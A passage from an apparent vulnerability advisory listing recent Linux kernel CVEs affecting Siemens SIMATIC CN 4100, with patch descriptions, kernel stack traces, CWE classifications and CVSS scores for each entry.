0x3 64: ld.d $t2, $t2, 264 68: beq $t2, $zero, -28 # 0x0000004c Before apply this patch, the follow test case will reveal soft lock issues. cd tools/testing/selftests/bpf/ ./test_progs --allow=tailcalls/tailcall_bpf2bpf_1 dmesg: watchdog: BUG: soft lockup - CPU#2 stuck for 26s! [test_progs:25056] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38724 In the Linux kernel, the following vulnerability has been resolved: nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm() Lei Lu recently reported that nfsd4_setclientid_confirm() did not check the return value from get_client_locked(). a SETCLIENTID_CONFIRM could race with a confirmed client expiring and fail to get a reference. That could later lead to a UAF. Fix this by getting a reference early in the case where there is an extant confirmed client. If that fails then treat it as if there were no confirmed client found at all. In the case where the unconfirmed client is expiring, just fail and return the result from get_client_locked(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38725 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: add phy_mask for ax88772 mdio bus Without setting phy_mask for ax88772 mdio bus, current driver may create at most 32 mdio phy devices with phy address range from 0x00 ~ 0x1f. DLink DUB-E100 H/W Ver B1 is such a device. However, only one main phy device will bind to net phy driver. This is creating issue during system suspend/resume since phy_polling_mode() in phy_state_machine() will directly deference member of phydev->drv for non-main phy devices. Then NULL pointer dereference issue will occur. Due to only external phy or internal phy is necessary, add phy_mask for ax88772 mdio bus to workarnoud the issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38727 In the Linux kernel, the following vulnerability has been resolved: netlink: avoid infinite retry looping in netlink_unicast() netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has: rmem < READ_ONCE(sk->sk_rcvbuf) to check if the just increased rmem value fits into the socket's receive buffer. If not, it proceeds and tries to wait for the memory under: rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf) The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is equal to sk->sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212 (t=26000 jiffies g=230833 q=259957) NMI backtrace for cpu 0 CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014 Call Trace: dump_stack lib/dump_stack.c:120 nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105 nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62 rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335 rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590 update_process_times kernel/time/timer.c:1953 tick_sched_handle kernel/time/tick-sched.c:227 tick_sched_timer kernel/time/tick-sched.c:1399 __hrtimer_run_queues kernel/time/hrtimer.c:1652 hrtimer_interrupt kernel/time/hrtimer.c:1717 __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113 asm_call_irq_on_stack arch/x86/entry/entry_64.S:808 netlink_attachskb net/netlink/af_netlink.c:1234 netlink_unicast net/netlink/af_netlink.c:1349 kauditd_send_queue kernel/audit.c:776 kauditd_thread kernel/audit.c:897 kthread kernel/kthread.c:328 ret_from_fork arch/x86/entry/entry_64.S:304 Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code. Found by Linux Verification Center (linuxtesting.org). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38728 In the Linux kernel, the following vulnerability has been resolved: smb3: fix for slab out of bounds on mount to ksmbd With KASAN enabled, it is possible to get a slab out of bounds during mount to ksmbd due to missing check in parse_server_interfaces() (see below): BUG: KASAN: slab-out-of-bounds in parse_server_interfaces+0x14ee/0x1880 [cifs] Read of size 4 at addr ffff8881433dba98 by task mount/9827 CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary) Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: Dell Inc. Precision Tower 3620/0MWYPT, BIOS 2.13.1 06/14/2019 Call Trace: dump_stack_lvl+0x9f/0xf0 print_report+0xd1/0x670 __virt_addr_valid+0x22c/0x430 ? parse_server_interfaces+0x14ee/0x1880 [cifs] ? kasan_complete_mode_report_info+0x2a/0x1f0 ? parse_server_interfaces+0x14ee/0x1880 [cifs] kasan_report+0xd6/0x110 parse_server_interfaces+0x14ee/0x1880 [cifs] __asan_report_load_n_noabort+0x13/0x20 parse_server_interfaces+0x14ee/0x1880 [cifs] ? __pfx_parse_server_interfaces+0x10/0x10 [cifs] ? trace_hardirqs_on+0x51/0x60 SMB3_request_interfaces+0x1ad/0x3f0 [cifs] ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs] ? SMB2_tcon+0x23c/0x15d0 [cifs] smb3_qfs_tcon+0x173/0x2b0 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] ? cifs_get_tcon+0x105d/0x2120 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_get_tcon+0x105d/0x2120 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] cifs_mount_get_tcon+0x369/0xb90 [cifs] ? dfs_cache_find+0xe7/0x150 [cifs] dfs_mount_share+0x985/0x2970 [cifs] ? check_path.constprop.0+0x28/0x50 ? save_trace+0x54/0x370 ? __pfx_dfs_mount_share+0x10/0x10 [cifs] ? __lock_acquire+0xb82/0x2ba0 ? __kasan_check_write+0x18/0x20 cifs_mount+0xbc/0x9e0 [cifs] ? __pfx_cifs_mount+0x10/0x10 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_setup_cifs_sb+0x29d/0x810 [cifs] cifs_smb3_do_mount+0x263/0x1990 [cifs] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38729 In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Validate UAC3 power domain descriptors, too UAC3 power domain descriptors need to be verified with its variable bLength for avoiding the unexpected OOB accesses by malicious firmware, too. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-38732 In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_reject: don't leak dst refcount for loopback packets recent patches to add a WARN() when replacing skb dst entry found an old bug: WARNING: include/linux/skbuff.h:1165 skb_dst_check_unset include/linux/skbuff.h:1164 [inline] WARNING: include/linux/skbuff.h:1165 skb_dst_set include/linux/skbuff.h:1210 [inline] WARNING: include/linux/skbuff.h:1165 nf_reject_fill_skb_dst+0x2a4/0x330 net/ipv4/netfilter/nf_reject_ipv4.c:234 [..] Call Trace: nf_send_unreach+0x17b/0x6e0 net/ipv4/netfilter/nf_reject_ipv4.c:325 nft_reject_inet_eval+0x4bc/0x690 net/netfilter/nft_reject_inet.c:27 expr_call_ops_eval net/netfilter/nf_tables_core.c:237 [inline] .. This is because blamed commit forgot about loopback packets. Such packets already have a dst_entry attached, even at PRE_ROUTING stage. Instead of checking hook just check if the skb already has a route attached to it. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-911 Improper Update of Reference Count Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.8 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H CVE-2025-38735 In the Linux kernel, the following vulnerability has been resolved: gve: prevent ethtool ops after shutdown A crash can occur if an ethtool operation is invoked after shutdown() is called. shutdown() is invoked during system shutdown to stop DMA operations without performing expensive deallocations. It is discouraged to unregister the netdev in this path, so the device may still be visible to userspace and kernel helpers. In gve, shutdown() tears down most internal data structures. If an ethtool operation is dispatched after shutdown(), it will dereference freed or NULL pointers, leading to a kernel panic. While graceful shutdown normally quiesces userspace before invoking the reboot syscall, forced shutdowns (as observed on GCP VMs) can still trigger this path. Fix by calling netif_device_detach() in shutdown(). This marks the device as detached so the ethtool ioctl handler will skip dispatching operations to the driver. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38736 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization Syzbot reported shift-out-of-bounds exception on MDIO bus initialization. The PHY address should be masked to 5 bits (0-31). Without this mask, invalid PHY addresses could be used, potentially causing issues with MDIO bus operations. Fix this by masking the PHY address with 0x1f (31 decimal) to ensure it stays within the valid range. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39673 In the Linux kernel, the following vulnerability has been resolved: ppp: fix race conditions in ppp_fill_forward_path ppp_fill_forward_path() has two race conditions: 1. The ppp->channels list can change between list_empty() and list_first_entry(), as ppp_lock() is not held. If the only channel is deleted in ppp_disconnect_channel(), list_first_entry() may access an empty head or a freed entry, and trigger a panic. 2. pch->chan can be NULL. When ppp_unregister_channel() is called, pch->chan is set to NULL before pch is removed from ppp->channels. Fix these by using a lockless RCU approach: - Use list_first_or_null_rcu() to safely test and access the first list entry. - Convert list modifications on ppp->channels to their RCU variants and add synchronize_net() after removal. - Check for a NULL pch->chan before dereferencing it. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39675 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session() The function mod_hdcp_hdcp1_create_session() calls the function get_first_active_display(), but does not check its return value. The return value is a null pointer if the display list is empty. This will lead to a null pointer dereference. Add a null pointer check for get_first_active_display() and return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND if the function return null. This is similar to the commit c3e9826a2202 ("drm/amd/display: Add null pointer check for get_first_active_display()"). (cherry picked from commit 5e43eb3cd731649c4f8b9134f857be62a416c893) View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39676 In the Linux kernel, the following vulnerability has been resolved: scsi: qla4xxx: Prevent a potential error pointer dereference The qla4xxx_get_ep_fwdb() function is supposed to return NULL on error, but qla4xxx_ep_connect() returns error pointers. Propagating the error pointers will lead to an Oops in the caller, so change the error pointers to NULL. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-394 Unexpected Status Code or Return Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.1 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39681 In the Linux kernel, the following vulnerability has been resolved: x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper Since 923f3a2b48bd ("x86/resctrl: Query LLC monitoring properties once during boot") resctrl_cpu_detect() has been moved from common CPU initialization code to the vendor-specific BSP init helper, while Hygon didn't put that call in their code. This triggers a division by zero fault during early booting stage on our machines with X86_FEATURE_CQM* supported, where get_rdt_mon_resources() tries to calculate mon_l3_config with uninitialized boot_cpu_data.x86_cache_occ_scale. Add the missing resctrl_cpu_detect() in the Hygon BSP init helper. [ bp: Massage commit message. ] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39682 In the Linux kernel, the following vulnerability has been resolved: tls: fix handling of zero-length records on the rx_list Each recvmsg() call must process either - only contiguous DATA records (any number of them) - one non-DATA record If the next record has different type than what has already been processed we break out of the main processing loop. If the record has already been decrypted (which may be the case for TLS 1.3 where we don't know type until decryption) we queue the pending record to the rx_list. Next recvmsg() will pick it up from there. Queuing the skb to rx_list after zero-copy decrypt is not possible, since in that case we decrypted directly to the user space buffer, and we don't have an skb to queue (darg.skb points to the ciphertext skb for access to metadata like length). Only data records are allowed zero-copy, and we break the processing loop after each non-data record. So we should never zero-copy and then find out that the record type has changed. The corner case we missed is when the initial record comes from rx_list, and it's zero length. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2025-39683 In the Linux kernel, the following vulnerability has been resolved: tracing: Limit access to parser->buffer when trace_get_user failed When the length of the string written to set_ftrace_filter exceeds FTRACE_BUFF_MAX, the following KASAN alarm will be triggered: BUG: KASAN: slab-out-of-bounds in strsep+0x18c/0x1b0 Read of size 1 at addr ffff0000d00bd5ba by task ash/165 CPU: 1 UID: 0 PID: 165 Comm: ash Not tainted 6.16.0-g6bcdbd62bd56-dirty Hardware name: linux,dummy-virt (DT) Call trace: show_stack+0x34/0x50 (C) dump_stack_lvl+0xa0/0x158 print_address_description.constprop.0+0x88/0x398 print_report+0xb0/0x280 kasan_report+0xa4/0xf0 __asan_report_load1_noabort+0x20/0x30 strsep+0x18c/0x1b0 ftrace_process_regex.isra.0+0x100/0x2d8 ftrace_regex_release+0x484/0x618 __fput+0x364/0xa58 ____fput+0x28/0x40 task_work_run+0x154/0x278 do_notify_resume+0x1f0/0x220 el0_svc+0xec/0xf0 el0t_64_sync_handler+0xa0/0xe8 el0t_64_sync+0x1ac/0x1b0 The reason is that trace_get_user will fail when processing a string longer than FTRACE_BUFF_MAX, but not set the end of parser->buffer to 0. Then an OOB access will be triggered in ftrace_regex_release-> ftrace_process_regex->strsep->strpbrk. We can solve this problem by limiting access to parser->buffer when trace_get_user failed. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39684 In the Linux kernel, the following vulnerability has been resolved: comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl() syzbot reports a KMSAN kernel-infoleak in `do_insn_ioctl()`. A kernel buffer is allocated to hold `insn->n` samples (each of which is an `unsigned int`). For some instruction types, `insn->n` samples are copied back to user-space, unless an error code is being returned. The problem is that not all the instruction handlers that need to return data to userspace fill in the whole `insn->n` samples, so that there is an information leak. There is a similar syzbot report for `do_insnlist_ioctl()`, although it does not have a reproducer for it at the time of writing. One culprit is `insn_rw_emulate_bits()` which is used as the handler for `INSN_READ` or `INSN_WRITE` instructions for subdevices that do not have a specific handler for that instruction, but do have an `INSN_BITS` handler. For `INSN_READ` it only fills in at most 1 sample, so if `insn->n` is greater than 1, the remaining `insn->n - 1` samples copied to userspace will be uninitialized kernel data. Another culprit is `vm80xx_ai_insn_read()` in the "vm80xx" driver. It never returns an error, even if it fails to fill the buffer. Fix it in `do_insn_ioctl()` and `do_insnlist_ioctl()` by making sure that uninitialized parts of the allocated buffer are zeroed before handling each instruction. Thanks to Arnaud Lecomte for their fix to `do_insn_ioctl()`. That fix replaced the call to `kmalloc_array()` with `kcalloc()`, but it is not always necessary to clear the whole buffer. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39685 In the Linux kernel, the following vulnerability has been resolved: comedi: pcl726: Prevent invalid irq number The reproducer passed in an irq number(0x80008000) that was too large, which triggered the oob. Added an interrupt number check to prevent users from passing in an irq number that was too large. If `it->options[1]` is 31, then `1 options[1]` is still invalid because it shifts a 1-bit into the sign bit (which is UB in C). Possible solutions include reducing the upper bound on the `it->options[1]` value to 30 or lower, or using `1U options[1]`. The old code would just not attempt to request the IRQ if the `options[1]` value were invalid. And it would still configure the device without interrupts even if the call to `request_irq` returned an error. So it would be better to combine this test with the test below. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39686 In the Linux kernel, the following vulnerability has been resolved: comedi: Make insn_rw_emulate_bits() do insn->n samples The `insn_rw_emulate_bits()` function is used as a default handler for `INSN_READ` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_READ`. Similarly, it is used as a default handler for `INSN_WRITE` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_WRITE`. It works by emulating the `INSN_READ` or `INSN_WRITE` instruction handling with a constructed `INSN_BITS` instruction. However, `INSN_READ` and `INSN_WRITE` instructions are supposed to be able read or write multiple samples, indicated by the `insn->n` value, but `insn_rw_emulate_bits()` currently only handles a single sample. For `INSN_READ`, the comedi core will copy `insn->n` samples back to user-space. (That triggered KASAN kernel-infoleak errors when `insn->n` was greater than 1, but that is being fixed more generally elsewhere in the comedi core.) Make `insn_rw_emulate_bits()` either handle `insn->n` samples, or return an error, to conform to the general expectation for `INSN_READ` and `INSN_WRITE` handlers. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39687 In the Linux kernel, the following vulnerability has been resolved: iio: light: as73211: Ensure buffer holes are zeroed Given that the buffer is copied to a kfifo that ultimately user space can read, ensure we zero it. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39689 In the Linux kernel, the following vulnerability has been resolved: ftrace: Also allocate and copy hash for reading of filter files Currently the reader of set_ftrace_filter and set_ftrace_notrace just adds the pointer to the global tracer hash to its iterator. Unlike the writer that allocates a copy of the hash, the reader keeps the pointer to the filter hashes. This is problematic because this pointer is static across function calls that release the locks that can update the global tracer hashes. This can cause UAF and similar bugs. Allocate and copy the hash for reading the filter files like it is done for the writers. This not only fixes UAF bugs, but also makes the code a bit simpler as it doesn't have to differentiate when to free the iterator's hash between writers and readers. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39691 In the Linux kernel, the following vulnerability has been resolved: fs/buffer: fix use-after-free when call bh_read() helper There's issue as follows: BUG: KASAN: stack-out-of-bounds in end_buffer_read_sync+0xe3/0x110 Read of size 8 at addr ffffc9000168f7f8 by task swapper/3/0 CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.16.0-862.14.0.6.x86_64 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) Call Trace: dump_stack_lvl+0x55/0x70 print_address_description.constprop.0+0x2c/0x390 print_report+0xb4/0x270 kasan_report+0xb8/0xf0 end_buffer_read_sync+0xe3/0x110 end_bio_bh_io_sync+0x56/0x80 blk_update_request+0x30a/0x720 scsi_end_request+0x51/0x2b0 scsi_io_completion+0xe3/0x480 ? scsi_device_unbusy+0x11e/0x160 blk_complete_reqs+0x7b/0x90 handle_softirqs+0xef/0x370 irq_exit_rcu+0xa5/0xd0 sysvec_apic_timer_interrupt+0x6e/0x90 Above issue happens when do ntfs3 filesystem mount, issue may happens as follows: mount IRQ ntfs_fill_super read_cache_page do_read_cache_folio filemap_read_folio mpage_read_folio do_mpage_readpage ntfs_get_block_vbo bh_read submit_bh wait_on_buffer(bh); blk_complete_reqs scsi_io_completion scsi_end_request blk_update_request end_bio_bh_io_sync end_buffer_read_sync __end_buffer_read_notouch unlock_buffer wait_on_buffer(bh);--> return will return to caller put_bh --> trigger stack-out-of-bounds In the mpage_read_folio() function, the stack variable 'map_bh' is passed to ntfs_get_block_vbo(). Once unlock_buffer() unlocks and wait_on_buffer() returns to continue processing, the stack variable is likely to be reclaimed. Consequently, during the end_buffer_read_sync() process, calling put_bh() may result in stack overrun. If the bh is not allocated on the stack, it belongs to a folio. Freeing a buffer head which belongs to a folio is done by drop_buffers() which will fail to free buffers which are still locked. So it is safe to call put_bh() before __end_buffer_read_notouch(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H CVE-2025-39692 In the Linux kernel, the following vulnerability has been resolved: smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy() We can't call destroy_workqueue(smb_direct_wq); before stop_sessions()! Otherwise already existing connections try to use smb_direct_wq as a NULL pointer. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39693 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Avoid a NULL pointer dereference [WHY] Although unlikely drm_atomic_get_new_connector_state() or drm_atomic_get_old_connector_state() can return NULL. [HOW] Check returns before dereference. (cherry picked from commit 1e5e8d672fec9f2ab352be121be971877bff2af9) View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39694 In the Linux kernel, the following vulnerability has been resolved: s390/sclp: Fix SCCB present check Tracing code called by the SCLP interrupt handler contains early exits if the SCCB address associated with an interrupt is NULL. This check is performed after physical to virtual address translation. If the kernel identity mapping does not start at address zero, the resulting virtual address is never zero, so that the NULL checks won't work. Subsequently this may result in incorrect accesses to the first page of the identity mapping. Fix this by introducing a function that handles the NULL case before address translation. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39697 In the Linux kernel, the following vulnerability has been resolved: NFS: Fix a race when updating an existing write After nfs_lock_and_join_requests() tests for whether the request is still attached to the mapping, nothing prevents a call to nfs_inode_remove_request() from succeeding until we actually lock the page group. The reason is that whoever called nfs_inode_remove_request() doesn't necessarily have a lock on the page group head. So in order to avoid races, let's take the page group lock earlier in nfs_lock_and_join_requests(), and hold it across the removal of the request in nfs_inode_remove_request(). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39701 In the Linux kernel, the following vulnerability has been resolved: ACPI: pfr_update: Fix the driver update version check The security-version-number check should be used rather than the runtime version check for driver updates. Otherwise, the firmware update would fail when the update binary had a lower runtime version number than the current one. [ rjw: Changelog edits ] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-1025 Comparison Using 